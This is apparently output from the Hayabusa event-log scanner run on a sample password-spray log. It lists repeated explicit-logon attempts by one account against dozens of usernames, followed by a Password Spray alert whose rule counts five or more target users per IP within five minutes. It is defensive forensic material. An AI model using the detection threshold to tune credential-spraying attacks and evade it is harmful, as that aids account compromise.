Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 2019-05-01 04:32:03.525 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:bking/edygert/drook/cragoso/ssims/jlake/jorchilles/bgreenwood/mdouglas/baker/smisenar/dmashburn/bgalbraith/cspizor IpAddress:172.16.144.128 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_PW-Spray_Count.yml,- 2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx 